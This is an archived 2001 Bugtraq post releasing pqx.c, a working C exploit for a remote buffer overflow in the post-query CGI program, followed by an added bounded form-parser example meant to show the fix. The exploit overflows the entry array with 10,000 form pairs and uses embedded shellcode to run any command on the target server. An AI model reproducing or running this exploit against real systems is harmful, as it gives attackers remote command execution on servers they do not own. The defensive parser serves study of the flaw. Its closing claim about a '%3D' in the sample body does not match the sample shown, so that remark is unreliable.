Date: Mon, 12 Mar 2001 12:39:56 +0100
From: proton <proton@ENERGYMECH.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Exploit: pqx.c -- post-query (CGI) remote buffer overflow

Attached is a working exploit program for Linux-ix86.

You may or may not be vulnerable to this exploit depending on a number of factors. Better safe than sorry, remove post-query if you have it. It is an example program designed to demonstrate how posting to CGI works and as such isn't useful for any normal webserver operations.

In case the attachment is corrupted or lost, there is a copy available at:

http://www.energymech.net/users/proton/pqx.c

/proton [ http://www.energymech.net/users/proton/ ]

[Attachment: pqx.c]

/*
 |  pqx.c -- post-query buffer overflow exploit for Linux-ix86
 |  Copyright (c) 2001 by proton. All rights reserved.
 |
 |  This program is free software; you can redistribute it and/or modify
 |  it under the terms of the GNU General Public License as published by
 |  the Free Software Foundation; either version 2 of the License, or
 |  (at your option) any later version.
 |
 |  This program is distributed in the hope that it will be useful,
 |  but WITHOUT ANY WARRANTY; without even the implied warranty of
 |  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 |  GNU General Public License for more details.
 */

/*
 * What it does: connects to port 80 on <host>, POSTs to /cgi-bin/post-query
 * a body made of 9999 '&' separators followed by one last name=value pair
 * whose name and value are both the shellcode, with "/bin/sh -c <command>@"
 * appended.  The shellcode turns that trailing string into an execve()
 * argument vector and runs <command> on the server; whatever the command
 * prints comes back in the HTTP response and is echoed to stdout.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

char    tmp[512];
char    *host;
char    *progname;
char    *command;

#define output(x)       write(1,x,sizeof(x))

/*
 * Linux/x86 shellcode, no '&', '=', '%' or '+' bytes so post-query's form
 * decoding leaves it intact.  jmp/call/pop leaves esi pointing at the 16
 * filler bytes (0x01) at the end; in the POSTed body those are followed by
 * "/bin/sh -c <command>@".  The code writes argv[0..2] pointers and a NULL
 * over the filler, scans forward for the '@' terminator and NUL-terminates
 * each argument, then calls execve (syscall 11) and exit (syscall 1).
 */
unsigned char shellcode[] =
    "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
    "\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
    "\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xc0\xff\xff\xff\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
    "\x01\x01\x00";

/* Connect to host:80 and send the POST request line and headers; sz is the
 * Content-Length the body will have.  Both socket handles are the same fd. */
void netpipe(int *rsock, int *wsock, int sz)
{
    struct  sockaddr_in sai;
    struct  hostent *he;
    int     s;

    if (!host || !*host || !command || !*command)
    {
        printf("Usage: %s <host> \"<command>\"\n",progname);
        exit(1);
    }
    he = gethostbyname(host);
    if (!he)
    {
        printf("%s: Unknown host\n",host);
        exit(1);
    }

    s = socket(AF_INET,SOCK_STREAM,0);
    memset(&sai,0,sizeof(sai));
    sai.sin_family = AF_INET;
    sai.sin_port = htons(80);
    memcpy(&sai.sin_addr,he->h_addr_list[0],sizeof(struct in_addr));

    if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
    {
        switch(errno)
        {
        case ECONNREFUSED:
            output("Connection refused.\n");
            break;
        case ETIMEDOUT:
            output("Connection timed out.\n");
            break;
        case ENETUNREACH:
            output("Network unreachable.\n");
            break;
        default:
            output("Unknown error.\n");
            break;
        }
        exit(1);
    }
    output("Connection established.\n");

    *rsock = *wsock = s;
    sprintf(tmp,"POST /cgi-bin/post-query HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: %i\r\n\r\n",sz);
    write(s,tmp,strlen(tmp));
}

/* Trailer appended after the shellcode; '@' marks the end of the command
 * for the shellcode's scan loop, so the command itself must not contain one. */
#define CMDSTUB         "/bin/sh -c %s@"

int main(int argc, char **argv)
{
    char    *q,*cp;
    int     in,out;
    int     sz,x,n;

    if (argc < 3)
    {
        fprintf(stderr,"Usage: %s <hostname> \"<command>\"\n",argv[0]);
        exit(1);
    }

    progname = argv[0];
    host = argv[1];
    command = argv[2];

    /* Length of the final "&<shellcode>=<shellcode>/bin/sh -c <command>@"
     * chunk (sizeof(CMDSTUB) counts the NUL, which is sent as well). */
    x = (2*strlen((char *)shellcode)) + strlen(command) + sizeof(CMDSTUB);
    sz = 9999 + x;

    netpipe(&in,&out,sz);

    /* 9999 empty pairs first, flushed in chunks that fit in tmp. */
    tmp[0] = 0;
    for(sz=0;sz<9999;sz++)
    {
        strcat(tmp,"&");
        if (strlen(tmp) > 500)
        {
            write(out,tmp,strlen(tmp));
            tmp[0] = 0;
        }
    }
    write(out,tmp,strlen(tmp));

    /* Then the pair carrying the shellcode and the command string. */
    sprintf(tmp,"&%s=%s",shellcode,shellcode);
    q = strchr(tmp,0);
    sprintf(q,CMDSTUB,command);
    write(out,tmp,x);

    output("Sent our shit.\n");

    /* Read the response line by line.  post-query echoes every pair back as
     * "<li> <code>name = value</code>"; the thousands of empty ones are
     * collapsed into a single notice, everything else is printed. */
    n = x = 0;
    for(;;)
    {
        sz = read(in,&tmp[x],512-x);
        if (sz < 1)
            break;
        x += sz;
        q = cp = tmp;
        for(sz=x;sz;)
        {
            if (*q == '\n')
            {
                if (strncmp(cp,"<li> <code> = </code>",q-cp))
                    write(1,cp,(q-cp)+1);
                else
                if (!n)
                {
                    write(1,"\n<!-- ignoring 10,000 lines of crap -->\n\n",41);
                    n++;
                }
                cp = q + 1;
            }
            q++;
            sz--;
        }
        /* Keep any partial last line for the next read. */
        if (cp != tmp)
        {
            sz = x - (cp - tmp);
            memcpy(tmp,cp,sz);
            x -= (cp - tmp);
        }
    }
    exit(0);
}
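The exploit works by POSTing far more '&'-separated pairs than post-query's fixed-size entry array was sized for, with the shellcode carried in the last pair. The bounded parser below is an added example written for this page; it is not post-query's code and not proton's. It counts the pairs before storing anything and refuses a body that would need more than MAX_ENTRIES slots (the 10000 capacity is an assumption chosen to mirror post-query's array), so a body shaped like the one pqx.c sends is rejected instead of indexing past the array. It also does the '+' and %XX decoding that application/x-www-form-urlencoded needs, and the sample body in main() is constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_ENTRIES 10000   /* assumed capacity, mirroring post-query's array */

typedef struct {
    char *name;   /* one allocation per pair; val points into it */
    char *val;
} entry;

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* In-place decode of '+' and %XX.  Output never grows, so the buffer is
 * safe; a malformed %XX is kept literally rather than consumed. */
static void url_unescape(char *s)
{
    size_t n = strlen(s), i, o = 0;
    for (i = 0; i < n; i++) {
        if (s[i] == '+') {
            s[o++] = ' ';
        } else if (s[i] == '%' && i + 2 < n &&
                   hexval(s[i + 1]) >= 0 && hexval(s[i + 2]) >= 0) {
            s[o++] = (char)(hexval(s[i + 1]) * 16 + hexval(s[i + 2]));
            i += 2;
        } else {
            s[o++] = s[i];
        }
    }
    s[o] = '\0';
}

void free_entries(entry *e, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        free(e[i].name);
}

/* Split a urlencoded body (len bytes, no NUL needed) into name/value pairs.
 * Returns the number of pairs stored, or -1 if the body would need more than
 * max_entries slots (or on allocation failure).  The count is taken before
 * anything is stored, so an over-long body never touches the array. */
int parse_form(const char *body, size_t len, entry *out, size_t max_entries)
{
    size_t i, start = 0, count = 1;

    for (i = 0; i < len; i++)          /* pairs = separators + 1 */
        if (body[i] == '&')
            count++;
    if (count > max_entries)
        return -1;

    count = 0;
    for (i = 0; i <= len; i++) {
        if (i == len || body[i] == '&') {
            size_t plen = i - start;
            char *pair = malloc(plen + 1), *eq;
            if (!pair) {
                free_entries(out, count);
                return -1;
            }
            memcpy(pair, body + start, plen);
            pair[plen] = '\0';
            eq = memchr(pair, '=', plen);
            if (eq)
                *eq = '\0';
            out[count].name = pair;
            out[count].val = eq ? eq + 1 : pair + plen;   /* no '=' -> "" */
            url_unescape(out[count].name);
            url_unescape(out[count].val);
            count++;
            start = i + 1;
        }
    }
    return (int)count;
}

/* Build a body shaped like the one pqx.c sends, `amps` separators followed
 * by one real pair, and report how parse_form() treats it against MAX_ENTRIES. */
int demo_body_with_separators(size_t amps)
{
    static entry entries[MAX_ENTRIES];
    size_t len = amps + 3;
    char *body = malloc(len);
    int n;

    if (!body)
        return -1;
    memset(body, '&', amps);
    memcpy(body + amps, "x=y", 3);
    n = parse_form(body, len, entries, MAX_ENTRIES);
    if (n > 0)
        free_entries(entries, (size_t)n);
    free(body);
    return n;
}

int main(void)
{
    entry e[8];
    const char *body = "a=1&b=hello+world&c=%41%42&d";   /* constructed sample */
    int n = parse_form(body, strlen(body), e, 8), i;

    for (i = 0; i < n; i++)
        printf("%s = %s\n", e[i].name, e[i].val);
    if (n > 0)
        free_entries(e, (size_t)n);
    printf("9999 separators: %d\n", demo_body_with_separators(9999));
    printf("10000 separators (pqx.c's shape): %d\n", demo_body_with_separators(10000));
    return 0;
}
```

9999 separators fill the array exactly and are accepted; pqx.c sends 10000 (9999 plus the one in front of its payload), which is one pair too many and is refused. The sample body also shows that a '%3D' inside a value stays a literal '=' because splitting happens before decoding.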